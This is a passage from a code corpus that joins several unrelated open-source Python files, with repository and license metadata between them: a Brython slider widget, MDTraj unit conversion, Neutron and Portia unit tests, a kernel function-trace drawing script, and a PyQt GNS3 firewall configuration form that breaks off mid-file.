luctus maecenas magna magnis malesuada massa mattis mauris metus mi molestie
mollis montes morbi mus nam nascetur natoque nec neque netus nibh nisi nisl non
nonummy nostra nulla nullam nunc odio orci ornare parturient pede pellentesque
penatibus per pharetra phasellus placerat platea porta porttitor posuere
potenti praesent pretium primis proin pulvinar purus quam quis quisque rhoncus
ridiculus risus rutrum sagittis sapien scelerisque sed sem semper senectus sit
sociis sociosqu sodales sollicitudin suscipit suspendisse taciti tellus tempor
tempus tincidunt torquent tortor tristique turpis ullamcorper ultrices
ultricies urna ut varius vehicula vel velit venenatis vestibulum vitae vivamus
viverra volutpat vulputate'''
| gpl-3.0 |
2014c2g12/c2g12 | wsgi/w2/static/Brython2.0.0-20140209-164925/Lib/ui/slider.py | 111 | 2275 | import widget
from browser import doc,html
class Slider(widget.Widget):
def __init__(self, id=None, label=False):
self._div_shell=html.DIV(Class="ui-slider ui-slider-horizontal ui-widget ui-widget-content ui-corner-all")
widget.Widget.__init__(self, self._div_shell, 'slider', id)
self._handle=html.A(Class="ui-slider-handle ui-state-default ui-corner-all",
Href='#', style={'left': '0px'})
self._value=0
self._isMouseDown=False
def startSlide(e):
self._isMouseDown=True
self._upperBound = self._div_shell.offsetWidth - self._handle.offsetWidth
pos = widget.getMousePosition(e)
self._startMouseX=pos['x']
            # style.left is a CSS length like '10px'; strip the unit before int()
            self._lastElementLeft = int(self._handle.style.left.replace('px', '') or 0)
updatePosition(e)
def updatePosition(e):
pos = widget.getMousePosition(e)
            #print('mouse pos', pos)
_newPos = self._lastElementLeft + pos['x'] - self._startMouseX
_newPos = max(0, _newPos)
_newPos = min(_newPos, self._upperBound)
self._handle.style.left = '%spx' % _newPos
#print('new position',self._handle.style.left)
self._lastElementLeft = _newPos
def moving(e):
if self._isMouseDown:
updatePosition(e)
def dropCallback(e):
self._isMouseDown=False
self._handle.unbind('mousemove', moving)
self._handle.bind('mousemove', moving)
self._handle.bind('mouseup', dropCallback)
#self._handle.bind('mouseout', dropCallback)
self._handle.bind('mousedown', startSlide)
def mouseover(e):
_class=self._handle.getAttribute('class')
self._handle.setAttribute('class', '%s %s' % (_class, 'ui-state-hover'))
def mouseout(e):
self._isMouseDown=False
_class=self._handle.getAttribute('class')
self._handle.setAttribute('class', _class.replace('ui-state-hover', ''))
self._handle.bind('mouseover', mouseover)
self._handle.bind('mouseout', mouseout)
self._div_shell <= self._handle
def get_value(self):
return self._value
#def set_value(self, value):
# self._value=value
# self._handle.style.left='%spx' % value
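# Minimal usage sketch in a Brython page (ids and attach pattern hypothetical):
#   slider = Slider(id='volume')
#   doc <= slider._div_shell # attach the slider's root element
#   print(slider.get_value())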
| gpl-2.0 |
leeping/mdtraj | mdtraj/utils/unit/__init__.py | 12 | 6902 | ##############################################################################
# MDTraj: A Python Library for Loading, Saving, and Manipulating
# Molecular Dynamics Trajectories.
# Copyright 2012-2013 Stanford University and the Authors
#
# Authors: Robert McGibbon
# Contributors:
#
# MDTraj is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with MDTraj. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
"""
Unit processing for MDTraj. This subpackage is a port of simtk.unit from
OpenMM. Unlike in simtk.openmm, the MDTraj library **does not pass around
"united quantities"**
The only publicly facing API from this package, for the purpose of MDTraj,
is "in_units_of", which does unit conversion of numbers or numpy arrays
where the input and output units are passed as strings.
"""
import ast
import sys
import numpy as np
from mdtraj.utils.unit.quantity import Quantity
from mdtraj.utils.unit import unit_definitions
from mdtraj.utils import import_, six
UNIT_DEFINITIONS = unit_definitions
try:
import simtk.unit as simtk_unit
except ImportError:
pass
__all__ = ['in_units_of']
class _UnitContext(ast.NodeTransformer):
"""Node transformer for an AST hack that turns raw strings into
complex simt.unit.Unit expressions. See _str_to_unit for how this
is used -- it's not really meant to stand on its own
"""
# we want to do some validation to ensure that the AST only
# contains "safe" operations. These are operations that can reasonably
# appear in unit expressions
allowed_ops = [ast.Expression, ast.BinOp, ast.Name, ast.Attribute,
ast.Pow, ast.Div, ast.Mult, ast.Num]
def visit(self, node):
if not any(isinstance(node, a) for a in self.allowed_ops):
            raise ValueError('Invalid unit expression. Contains disallowed '
'operation %s' % node.__class__.__name__)
return super(_UnitContext, self).visit(node)
def visit_Name(self, node):
# we want to prefix all names to look like unit.nanometers instead
# of just "nanometers", because I don't want to import * from
# units into this module
if not hasattr(unit_definitions, node.id):
            # also, let's take this opportunity to check that the node.id
# (which supposed to be the name of the unit, like "nanometers")
# is actually an attribute in simtk.unit
raise ValueError('%s is not a valid unit' % node.id)
return ast.Attribute(value=ast.Name(id='unit_definitions', ctx=ast.Load()),
attr=node.id, ctx=ast.Load())
_unit_context = _UnitContext() # global instance of the visitor
def _str_to_unit(unit_string, simtk=False):
"""eval() based transformer that extracts a simtk.unit object
from a string description.
Parameters
----------
unit_string : str
string description of a unit. this may contain expressions with
multiplication, division, powers, etc.
Examples
--------
>>> type(_str_to_unit('nanometers**2/meters*gigajoules'))
<class 'simtk.unit.unit.Unit'>
>>> str(_str_to_unit('nanometers**2/meters*gigajoules'))
'nanometer**2*gigajoule/meter'
"""
# parse the string with the ast, and then run out unit context
# visitor on it, which will basically change bare names like
# "nanometers" into "unit.nanometers" and simulataniously check that
# there's no nefarious stuff in the expression.
assert isinstance(unit_string, six.string_types)
unit_definitions = UNIT_DEFINITIONS
if simtk:
unit_definitions = import_('simtk.unit').unit_definitions
parsed = ast.parse(unit_string, mode='eval')
node = _unit_context.visit(parsed)
fixed_node = ast.fix_missing_locations(node)
output = eval(compile(fixed_node, '<string>', mode='eval'), {}, locals())
return output
def in_units_of(quantity, units_in, units_out, inplace=False):
"""Convert a numerical quantity between unit systems.
Parameters
----------
quantity : {number, np.ndarray, simtk.unit.Quantity}
quantity can either be a unitted quantity -- i.e. instance of
simtk.unit.Quantity, or just a bare number or numpy array
units_in : str
If you supply a quantity that's not a simtk.unit.Quantity, you should
        tell me what units it is in. If you don't, I'm just going to echo you
back your quantity without doing any unit checking.
units_out : str
A string description of the units you want out. This should look
like "nanometers/picosecond" or "nanometers**3" or whatever
inplace : bool
Attempt to do the transformation inplace, by mutating the `quantity`
argument and avoiding a copy. This is only possible if `quantity` is a
writable numpy array.
Returns
-------
rquantity : {number, np.ndarray}
The resulting quantity, in the new unit system. If the function was
called with `inplace=True` and `quantity` was a writable numpy array,
`rquantity` will alias the same memory as the input `quantity`, which
will have been changed inplace. Otherwise, if a copy was required,
`rquantity` will point to new memory.
Examples
--------
>>> in_units_of(1, 'meter**2/second', 'nanometers**2/picosecond')
1000000.0
"""
if quantity is None:
return quantity
if 'simtk.unit' in sys.modules and isinstance(quantity, simtk_unit.Quantity):
units_in = quantity.unit
units_out = _str_to_unit(units_out, simtk=True)
quantity = quantity._value
elif isinstance(quantity, Quantity):
units_in = quantity.unit
units_out = _str_to_unit(units_out)
quantity = quantity._value
else:
if units_in is None:
return quantity
units_in = _str_to_unit(units_in)
units_out = _str_to_unit(units_out)
if not units_in.is_compatible(units_out):
raise TypeError('Unit "%s" is not compatible with Unit "%s".' % (units_in, units_out))
factor = units_in.conversion_factor_to(units_out)
if inplace and (isinstance(quantity, np.ndarray) and quantity.flags['WRITEABLE']):
quantity *= factor
return quantity
return quantity * factor
| lgpl-2.1 |
virtualopensystems/neutron | neutron/tests/unit/nec/test_agent_scheduler.py | 5 | 4501 | # Copyright 2013 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
from neutron.common import constants
from neutron.db import l3_rpc_base
from neutron.tests.unit.nec import test_nec_plugin
from neutron.tests.unit.openvswitch import test_agent_scheduler
L3_HOSTA = test_agent_scheduler.L3_HOSTA
L3_HOSTB = test_agent_scheduler.L3_HOSTB
class NecAgentSchedulerTestCase(
test_agent_scheduler.OvsAgentSchedulerTestCase,
test_nec_plugin.NecPluginV2TestCaseBase):
plugin_str = test_nec_plugin.PLUGIN_NAME
l3_plugin = None
def setUp(self):
self.setup_nec_plugin_base()
super(NecAgentSchedulerTestCase, self).setUp()
class NecDhcpAgentNotifierTestCase(
test_agent_scheduler.OvsDhcpAgentNotifierTestCase,
test_nec_plugin.NecPluginV2TestCaseBase):
plugin_str = test_nec_plugin.PLUGIN_NAME
def setUp(self):
self.setup_nec_plugin_base()
super(NecDhcpAgentNotifierTestCase, self).setUp()
class NecL3AgentNotifierTestCase(
test_agent_scheduler.OvsL3AgentNotifierTestCase,
test_nec_plugin.NecPluginV2TestCaseBase):
plugin_str = test_nec_plugin.PLUGIN_NAME
l3_plugin = None
def setUp(self):
self.setup_nec_plugin_base()
super(NecL3AgentNotifierTestCase, self).setUp()
class NecL3AgentSchedulerWithOpenFlowRouter(
test_agent_scheduler.OvsAgentSchedulerTestCaseBase,
test_nec_plugin.NecPluginV2TestCaseBase):
plugin_str = test_nec_plugin.PLUGIN_NAME
def setUp(self):
self.setup_nec_plugin_base()
super(NecL3AgentSchedulerWithOpenFlowRouter, self).setUp()
def test_router_auto_schedule_with_l3agent_and_openflow(self):
with contextlib.nested(
self.router(),
self.router(arg_list=('provider',),
provider='openflow'
)) as (r1, r2):
l3_rpc = l3_rpc_base.L3RpcCallbackMixin()
self._register_agent_states()
ret_a = l3_rpc.sync_routers(self.adminContext, host=L3_HOSTA)
ret_b = l3_rpc.sync_routers(self.adminContext, host=L3_HOSTB)
l3_agents = self._list_l3_agents_hosting_router(
r1['router']['id'])
self.assertEqual(1, len(ret_a))
self.assertFalse(len(ret_b))
self.assertIn(r1['router']['id'], [r['id'] for r in ret_a])
self.assertNotIn(r2['router']['id'], [r['id'] for r in ret_a])
self.assertEqual(1, len(l3_agents['agents']))
self.assertEqual(L3_HOSTA, l3_agents['agents'][0]['host'])
def test_router_auto_schedule_only_with_openflow_router(self):
with contextlib.nested(
self.router(arg_list=('provider',), provider='openflow'),
self.router(arg_list=('provider',), provider='openflow')
) as (r1, r2):
l3_rpc = l3_rpc_base.L3RpcCallbackMixin()
self._register_agent_states()
ret_a = l3_rpc.sync_routers(self.adminContext, host=L3_HOSTA)
l3_agents_1 = self._list_l3_agents_hosting_router(
r1['router']['id'])
l3_agents_2 = self._list_l3_agents_hosting_router(
r2['router']['id'])
self.assertFalse(len(ret_a))
self.assertNotIn(r1['router']['id'], [r['id'] for r in ret_a])
self.assertNotIn(r2['router']['id'], [r['id'] for r in ret_a])
self.assertFalse(len(l3_agents_1['agents']))
self.assertFalse(len(l3_agents_2['agents']))
def test_add_router_to_l3_agent_for_openflow_router(self):
with self.router(arg_list=('provider',), provider='openflow') as r1:
self._register_agent_states()
hosta_id = self._get_agent_id(constants.AGENT_TYPE_L3,
L3_HOSTA)
self._add_router_to_l3_agent(hosta_id,
r1['router']['id'],
expected_code=409)
| apache-2.0 |
Suninus/portia | slyd/tests/test_repoman.py | 14 | 9855 | import unittest
from tempfile import mkdtemp
from os.path import join
from shutil import rmtree
from json import dumps, loads
import copy
from .settings import SPEC_DATA_DIR
from slyd.gitstorage.repoman import Repoman
def j(json):
return dumps(json, sort_keys=True, indent=4)
class RepomanTest(unittest.TestCase):
def setUp(self):
self.temp_repos_dir = mkdtemp(dir=SPEC_DATA_DIR,
prefix='test-run-')
Repoman.setup(
storage_backend='dulwich.fsrepo.FsRepo',
location=self.temp_repos_dir
)
def tearDown(self):
rmtree(self.temp_repos_dir)
def get_full_name(self, repo_name):
return join(self.temp_repos_dir, repo_name)
def test_create(self):
Repoman.create_repo(self.get_full_name('my_repo'))
self.assertTrue(Repoman.repo_exists(self.get_full_name('my_repo')))
def test_save_file(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
contents = j({'a': 1})
repoman.save_file('f1', contents, 'testbranch')
self.assertEqual(['f1'], repoman.list_files_for_branch('testbranch'))
self.assertEqual(
contents, repoman.file_contents_for_branch('f1', 'testbranch'))
def test_delete_file(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
contents = j({'a': 1})
repoman.save_file('f1', contents, 'testbranch')
repoman.delete_file('f1', 'testbranch')
self.assertEqual([], repoman.list_files_for_branch('testbranch'))
def test_branch_ops(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
repoman.create_branch('b1')
self.assertTrue(repoman.has_branch('b1'))
self.assertEqual(len(repoman.get_branch('b1')), 40)
repoman.delete_branch('b1')
self.assertFalse(repoman.has_branch('b1'))
def test_simple_publish(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
f1, f2, f3 = j({'a': 1}), j({'b': 2}), j({'c': 3})
repoman.save_file('f1', f1, 'b1')
repoman.save_file('f2', f2, 'b1')
repoman.save_file('x/f3', f3, 'b1')
repoman.save_file('f4', '{}', 'b1')
repoman.delete_file('f4', 'b1')
self.assertTrue(repoman.has_branch('b1'))
self.assertTrue(repoman.has_branch('master'))
self.assertEqual([], repoman.list_files_for_branch('master'))
self.assertTrue(repoman.publish_branch('b1'))
self.assertItemsEqual(['f1', 'f2', 'x/f3'],
repoman.list_files_for_branch('master'))
self.assertEqual([f1, f2, f3],
[repoman.file_contents_for_branch(x, 'b1')
for x in ('f1', 'f2', 'x/f3')])
self.assertEqual([f1, f2, f3],
[repoman.file_contents_for_branch(x, 'master')
for x in ('f1', 'f2', 'x/f3')])
# Only one published revision
self.assertEqual(len(repoman.get_published_revisions()), 1)
# 6 checkpoints, 1 per operation (5) + 1 for the original state.
self.assertEqual(len(repoman.get_branch_checkpoints('b1')), 6)
def test_sequential_publishes(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
f1, f2 = j({'a': 1}), j({'b': 2})
repoman.save_file('f1', f1, 'b1')
repoman.save_file('x/f2', f2, 'b1')
repoman.publish_branch('b1')
repoman.delete_branch('b1')
# f1 is modified in branch b2
f1 = j({'a': 3})
repoman.save_file('f1', f1, 'b2')
self.assertTrue(repoman.publish_branch('b2'))
self.assertEqual([f1, f2],
[repoman.file_contents_for_branch(x, 'master')
for x in ('f1', 'x/f2')])
self.assertEqual(len(repoman.get_published_revisions()), 2)
def test_two_interleaved_publishes_1(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
f1, f2 = j({'a': 1}), j({'b': 2})
repoman.save_file('f1', f1, 'b1')
repoman.save_file('x/f2', f2, 'b1')
# branch b2 modifies the same files concurrently
f1, f2 = j({'c': 3}), j({'d': 4})
repoman.save_file('f1', f1, 'b2')
repoman.save_file('x/f2', f2, 'b2')
# both publish their changes, but the automerge should solve conflicts
self.assertTrue(repoman.publish_branch('b1'))
self.assertTrue(repoman.publish_branch('b2'))
self.assertEqual(j({'a': 1, 'c': 3}),
repoman.file_contents_for_branch('f1', 'master'))
self.assertEqual(j({'b': 2, 'd': 4}),
repoman.file_contents_for_branch('x/f2', 'master'))
self.assertEqual(len(repoman.get_published_revisions()), 2)
def test_two_interleaved_publishes_2(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
f1 = j({'a': 1, 'c': 3})
repoman.save_file('f1', f1, 'b1')
self.assertTrue(repoman.publish_branch('b1'))
repoman.delete_branch('b1')
# b1 adds x/f2.
f2 = j({'b': 2})
repoman.save_file('x/f2', f2, 'b1')
# branch b2 adds a file with the same name but different content
f2 = j({'a': 2, 'c': {'d': 1}})
repoman.save_file('x/f2', f2, 'b2')
repoman.delete_file('f1', 'b2')
# both publish their changes, but the automerge should solve conflicts
self.assertTrue(repoman.publish_branch('b1'))
self.assertTrue(repoman.publish_branch('b2'))
self.assertEqual(j({'a': 2, 'b': 2, 'c': {'d': 1}}),
repoman.file_contents_for_branch('x/f2', 'master'))
self.assertEqual(len(repoman.get_published_revisions()), 3)
@unittest.skip('Broken, TODO check') # TODO
def test_two_interleaved_publishes_3(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
f1 = j({'a': 1, 'c': 3, 'd': 4, 'e': 5})
repoman.save_file('f1', f1, 'b1')
self.assertTrue(repoman.publish_branch('b1'))
repoman.delete_branch('b1')
# b1 heavily edits f1
repoman.save_file('f1', j({'b': 2, 'e': 5}), 'b1')
# this case is VERY tricky. branch 2 renames f1 to f2 and changes
# it a bit. The merge algorithm detects the rename and the merged
# output ends up containing all b1 changes + all b2 changes, and the
# file is stored under the name given by branch2
repoman.delete_file('f1', 'b2')
repoman.save_file('f2', j({'a': 1, 'c': 3, 'd': 4, 'e': 6}), 'b2')
# both publish their changes, but the automerge should solve conflicts
self.assertTrue(repoman.publish_branch('b1'))
self.assertTrue(repoman.publish_branch('b2'))
self.assertEqual(j({'b': 2, 'e': 6}),
repoman.file_contents_for_branch('f2', 'master'))
self.assertEqual(len(repoman.get_published_revisions()), 3)
def test_modify_delete(self):
# Although this is usually treated as a conflict, here we just keep the
# modified version and ignore the delete.
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
repoman.save_file('f1', j({'a': 1}), 'b1')
self.assertTrue(repoman.publish_branch('b1'))
repoman.delete_branch('b1')
# b1 deletes f1 and b2 modifies it.
repoman.delete_file('f1', 'b1')
repoman.save_file('f1', j({'a': 2, 'c': 3}), 'b2')
self.assertTrue(repoman.publish_branch('b1'))
self.assertTrue(repoman.publish_branch('b2'))
# master has f1.
self.assertEqual(['f1'], repoman.list_files_for_branch('master'))
self.assertEqual(j({'a': 2, 'c': 3}),
repoman.file_contents_for_branch('f1', 'master'))
def test_unresolved_conflicts_both_modify(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
repoman.save_file('f1', j({'a': 1}), 'b1')
self.assertTrue(repoman.publish_branch('b1'))
repoman.delete_branch('b1')
# both branches update the same key of the same file with different
# values. This conflict must be manually resolved
repoman.save_file('f1', j({'a': 2}), 'b1')
repoman.save_file('f1', j({'a': 3}), 'b2')
self.assertTrue(repoman.publish_branch('b1'))
self.assertFalse(repoman.publish_branch('b2'))
# the file appears as published by b1 in the master branch
self.assertEqual(j({'a': 2}),
repoman.file_contents_for_branch('f1', 'master'))
# the file in b2 has an unresolved conflict
self.assertIn('__CONFLICT',
j(repoman.file_contents_for_branch('f1', 'b2')))
# b2 solves the conflict, saves again and forces the publish
repoman.save_file('f1', j({'a': 3}), 'b2')
self.assertTrue(repoman.publish_branch('b2', force=True))
self.assertEqual(j({'a': 3}),
repoman.file_contents_for_branch('f1', 'master'))
def test_unresolved_conflicts_both_add(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
# both add the same file with a conflicting key
repoman.save_file('f1', j({'a': 1}), 'b1')
repoman.save_file('f1', j({'a': 2}), 'b2')
self.assertTrue(repoman.publish_branch('b1'))
self.assertFalse(repoman.publish_branch('b2'))
# the file appears as published by b1 in the master branch
self.assertEqual(j({'a': 1}),
repoman.file_contents_for_branch('f1', 'master'))
# the file in b2 has an unresolved conflict
self.assertIn('__CONFLICT',
j(repoman.file_contents_for_branch('f1', 'b2')))
| bsd-3-clause |
lmajewski/linux-samsung-thermal | scripts/tracing/draw_functrace.py | 14676 | 3560 | #!/usr/bin/python
"""
Copyright 2008 (c) Frederic Weisbecker <[email protected]>
Licensed under the terms of the GNU GPL License version 2
This script parses a trace provided by the function tracer in
kernel/trace/trace_functions.c
The resulting trace is processed into a tree to produce a more
human-readable view of the call stack, drawn as a textual but
hierarchical tree of calls. Only the functions' names and the call
times are provided.
Usage:
Be sure that you have CONFIG_FUNCTION_TRACER
# mount -t debugfs nodev /sys/kernel/debug
# echo function > /sys/kernel/debug/tracing/current_tracer
$ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func
Wait for a while, but not too long: the script is a bit slow.
Break the pipe (Ctrl + Z)
$ scripts/draw_functrace.py < raw_trace_func > draw_functrace
Then you have your drawn trace in draw_functrace
"""
import sys, re
class CallTree:
""" This class provides a tree representation of the functions
call stack. If a function has no parent in the kernel (interrupt,
syscall, kernel thread...) then it is attached to a virtual parent
called ROOT.
"""
ROOT = None
def __init__(self, func, time = None, parent = None):
self._func = func
self._time = time
if parent is None:
self._parent = CallTree.ROOT
else:
self._parent = parent
self._children = []
def calls(self, func, calltime):
""" If a function calls another one, call this method to insert it
into the tree at the appropriate place.
@return: A reference to the newly created child node.
"""
child = CallTree(func, calltime, self)
self._children.append(child)
return child
def getParent(self, func):
""" Retrieve the last parent of the current node that
has the name given by func. If this function is not
		found among the parents, then create it as a new child of ROOT.
@return: A reference to the parent.
"""
tree = self
while tree != CallTree.ROOT and tree._func != func:
tree = tree._parent
if tree == CallTree.ROOT:
child = CallTree.ROOT.calls(func, None)
return child
return tree
def __repr__(self):
return self.__toString("", True)
def __toString(self, branch, lastChild):
if self._time is not None:
s = "%s----%s (%s)\n" % (branch, self._func, self._time)
else:
s = "%s----%s\n" % (branch, self._func)
i = 0
if lastChild:
branch = branch[:-1] + " "
while i < len(self._children):
if i != len(self._children) - 1:
s += "%s" % self._children[i].__toString(branch +\
" |", False)
else:
s += "%s" % self._children[i].__toString(branch +\
" |", True)
i += 1
return s
class BrokenLineException(Exception):
"""If the last line is not complete because of the pipe breakage,
we want to stop the processing and ignore this line.
"""
pass
class CommentLineException(Exception):
""" If the line is a comment (as in the beginning of the trace file),
just ignore it.
"""
pass
def parseLine(line):
line = line.strip()
if line.startswith("#"):
raise CommentLineException
m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line)
if m is None:
raise BrokenLineException
return (m.group(1), m.group(2), m.group(3))
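# Sketch of the expected line shape (hypothetical trace content):
#   parseLine("bash-4251 [001] 1270.418611: do_sys_open <-sys_open")
#   returns ("1270.418611", "do_sys_open", "sys_open")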
def main():
CallTree.ROOT = CallTree("Root (Nowhere)", None, None)
tree = CallTree.ROOT
for line in sys.stdin:
try:
calltime, callee, caller = parseLine(line)
except BrokenLineException:
break
except CommentLineException:
continue
tree = tree.getParent(caller)
tree = tree.calls(callee, calltime)
print CallTree.ROOT
if __name__ == "__main__":
main()
| gpl-2.0 |
GNS3/gns3-legacy | src/GNS3/Ui/ConfigurationPages/Form_PIXPage.py | 3 | 8636 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file './ConfigurationPages/Form_PIXPage.ui'
#
# Created: Mon Sep 9 21:29:23 2013
# by: PyQt4 UI code generator 4.8.6
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_PIXPage(object):
def setupUi(self, PIXPage):
PIXPage.setObjectName(_fromUtf8("PIXPage"))
PIXPage.resize(419, 453)
PIXPage.setWindowTitle(QtGui.QApplication.translate("PIXPage", "Firewall configuration", None, QtGui.QApplication.UnicodeUTF8))
self.gridLayout = QtGui.QGridLayout(PIXPage)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.label_17 = QtGui.QLabel(PIXPage)
self.label_17.setText(QtGui.QApplication.translate("PIXPage", "PIX Image:", None, QtGui.QApplication.UnicodeUTF8))
self.label_17.setObjectName(_fromUtf8("label_17"))
self.gridLayout.addWidget(self.label_17, 0, 0, 1, 1)
self.lineEditImage = QtGui.QLineEdit(PIXPage)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineEditImage.sizePolicy().hasHeightForWidth())
self.lineEditImage.setSizePolicy(sizePolicy)
self.lineEditImage.setObjectName(_fromUtf8("lineEditImage"))
self.gridLayout.addWidget(self.lineEditImage, 0, 1, 1, 1)
self.pushButtonImageBrowser = QtGui.QPushButton(PIXPage)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushButtonImageBrowser.sizePolicy().hasHeightForWidth())
self.pushButtonImageBrowser.setSizePolicy(sizePolicy)
self.pushButtonImageBrowser.setMaximumSize(QtCore.QSize(31, 27))
self.pushButtonImageBrowser.setText(QtGui.QApplication.translate("PIXPage", "...", None, QtGui.QApplication.UnicodeUTF8))
self.pushButtonImageBrowser.setObjectName(_fromUtf8("pushButtonImageBrowser"))
self.gridLayout.addWidget(self.pushButtonImageBrowser, 0, 2, 1, 1)
self.label_24 = QtGui.QLabel(PIXPage)
self.label_24.setText(QtGui.QApplication.translate("PIXPage", "RAM:", None, QtGui.QApplication.UnicodeUTF8))
self.label_24.setObjectName(_fromUtf8("label_24"))
self.gridLayout.addWidget(self.label_24, 1, 0, 1, 1)
self.spinBoxRamSize = QtGui.QSpinBox(PIXPage)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.spinBoxRamSize.sizePolicy().hasHeightForWidth())
self.spinBoxRamSize.setSizePolicy(sizePolicy)
self.spinBoxRamSize.setSuffix(QtGui.QApplication.translate("PIXPage", " MiB", None, QtGui.QApplication.UnicodeUTF8))
self.spinBoxRamSize.setMaximum(100000)
self.spinBoxRamSize.setSingleStep(4)
self.spinBoxRamSize.setProperty("value", 128)
self.spinBoxRamSize.setObjectName(_fromUtf8("spinBoxRamSize"))
self.gridLayout.addWidget(self.spinBoxRamSize, 1, 1, 1, 2)
self.label_37 = QtGui.QLabel(PIXPage)
self.label_37.setText(QtGui.QApplication.translate("PIXPage", "Number of NICs:", None, QtGui.QApplication.UnicodeUTF8))
self.label_37.setObjectName(_fromUtf8("label_37"))
self.gridLayout.addWidget(self.label_37, 2, 0, 1, 1)
self.spinBoxNics = QtGui.QSpinBox(PIXPage)
self.spinBoxNics.setMinimum(0)
self.spinBoxNics.setMaximum(100000)
self.spinBoxNics.setSingleStep(1)
self.spinBoxNics.setProperty("value", 6)
self.spinBoxNics.setObjectName(_fromUtf8("spinBoxNics"))
self.gridLayout.addWidget(self.spinBoxNics, 2, 1, 1, 2)
self.label_26 = QtGui.QLabel(PIXPage)
self.label_26.setText(QtGui.QApplication.translate("PIXPage", "NIC model:", None, QtGui.QApplication.UnicodeUTF8))
self.label_26.setObjectName(_fromUtf8("label_26"))
self.gridLayout.addWidget(self.label_26, 3, 0, 1, 1)
self.comboBoxNIC = QtGui.QComboBox(PIXPage)
self.comboBoxNIC.setEnabled(True)
self.comboBoxNIC.setObjectName(_fromUtf8("comboBoxNIC"))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(0, QtGui.QApplication.translate("PIXPage", "ne2k_pci", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(1, QtGui.QApplication.translate("PIXPage", "i82551", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(2, QtGui.QApplication.translate("PIXPage", "i82557b", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(3, QtGui.QApplication.translate("PIXPage", "i82559er", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(4, QtGui.QApplication.translate("PIXPage", "rtl8139", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(5, QtGui.QApplication.translate("PIXPage", "e1000", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(6, QtGui.QApplication.translate("PIXPage", "pcnet", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(7, QtGui.QApplication.translate("PIXPage", "virtio", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(8, QtGui.QApplication.translate("PIXPage", "virtio-net-pci", None, QtGui.QApplication.UnicodeUTF8))
self.gridLayout.addWidget(self.comboBoxNIC, 3, 1, 1, 2)
self.label_8 = QtGui.QLabel(PIXPage)
self.label_8.setText(QtGui.QApplication.translate("PIXPage", "Qemu Options:", None, QtGui.QApplication.UnicodeUTF8))
self.label_8.setObjectName(_fromUtf8("label_8"))
self.gridLayout.addWidget(self.label_8, 4, 0, 1, 1)
self.lineEditOptions = QtGui.QLineEdit(PIXPage)
self.lineEditOptions.setEnabled(True)
self.lineEditOptions.setObjectName(_fromUtf8("lineEditOptions"))
self.gridLayout.addWidget(self.lineEditOptions, 4, 1, 1, 2)
self.label_20 = QtGui.QLabel(PIXPage)
self.label_20.setText(QtGui.QApplication.translate("PIXPage", "Key:", None, QtGui.QApplication.UnicodeUTF8))
self.label_20.setObjectName(_fromUtf8("label_20"))
self.gridLayout.addWidget(self.label_20, 5, 0, 1, 1)
self.lineEditKey = QtGui.QLineEdit(PIXPage)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
